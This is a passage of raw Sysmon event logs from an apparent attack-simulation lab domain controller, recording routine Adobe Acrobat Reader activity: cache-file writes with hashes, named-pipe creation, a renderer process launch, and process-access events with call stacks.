(x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0MD5=9C46F9947D5FA64DFCD7560A9063E571,SHA256=17F86950C26E044B36E4AA780E7AA31CD0B5EC87F5466172028076BDF1EA51DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047276Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.405{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0MD5=DD73A621F908B42193552B5D1981C73B,SHA256=D63B8C2430636E8B57F081BDBE05E121E461223567459BB01D77904B0C828473,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047275Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.405{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0MD5=E3F589528CAA1B0DF2EAB951EC2622F1,SHA256=51677AC37437CFC540FDA9DEBE773C77966AD950D4E7061EF12EEA1DE267E82B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047274Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.405{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0MD5=CAFB418033131F73425759E734262A4B,SHA256=EB4197A44B98DCD1268FDA62DC8ADA6C1A1A6BF84DB4EC268A46B9A431C1F46C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 18141800x800000000000000047273Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:19.365{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.14204681211984985560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000047272Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:19.365{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.14204681211984985560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 18141800x800000000000000047271Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:19.365{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.18197701199985444123C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000047270Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:19.365{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.18197701199985444123C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 18141800x800000000000000047269Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:19.365{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.14115870196154020104C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000047268Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:19.365{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.14115870196154020104C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000047267Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.365{FE4C2B44-E650-63C7-8906-00000000AF02}37966944C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d342d7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+11f6df2(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efed18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efeba0(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4734(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4223(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9a5cd(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9b4f4(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c991da(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99794(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99674(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+40cbbf(wow64) 10341000x800000000000000047266Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.365{FE4C2B44-E650-63C7-8906-00000000AF02}37966944C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d342d7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+11f6df2(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efed18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efeba0(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4734(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4223(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9a5cd(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9b4f4(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c991da(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99794(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99674(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+40cbbf(wow64) 10341000x800000000000000047265Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.364{FE4C2B44-E650-63C7-8906-00000000AF02}37966944C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d342d7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+11f6df2(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efed18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efeba0(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4734(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4223(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9a5cd(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9b4f4(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c991da(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99794(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99674(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+40cbbf(wow64) 10341000x800000000000000047264Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.358{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047263Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.358{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000047262Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:19.264{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.17407964921263731703C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000047261Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:19.264{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.17407964921263731703C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000047260Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.261{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047259Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.261{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047258Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.260{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047257Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.260{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047256Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.260{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047255Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.260{FE4C2B44-E650-63C7-8906-00000000AF02}37963120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9888(wow64)|C:\Windows\System32\KERNELBASE.dll+157bad(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe+1136f|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe+2465|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+32aa1bc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+f3c9d6(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+17a4c0e(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+13618b7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d01d85(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c56e7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c53b6(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c50f1(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+5794b9d(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+57948e5(wow64) 154100x800000000000000047254Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.260{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe22.3.20310.0Adobe RdrCEFAdobe AcroCEFAdobe Systems IncorporatedAcroCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/22.3.20310 Chrome/105.0.0.0" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --launch-time-ticks=3178679228 --mojo-platform-channel-handle=3104 --field-trial-handle=1448,i,5134491287969886603,3611864682310924974,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1C:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=387770AB000A15CC3D30E0594F2AFC02,SHA256=AD06655370603DD0F76F2E7824F749DA4B753EF57ECAE93B9A24B5EB7F5EC27A,IMPHASH=6B10CB5D44CC40175E3AB76C7CC1D2A0{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe" --backgroundcolor=16514043 10341000x800000000000000047253Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.259{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047252Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.258{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000047251Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:19.252{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.5768.5095615409765323645C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000047250Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:19.252{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.5768.5095615409765323645C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000047249Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.126{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047248Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.126{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader 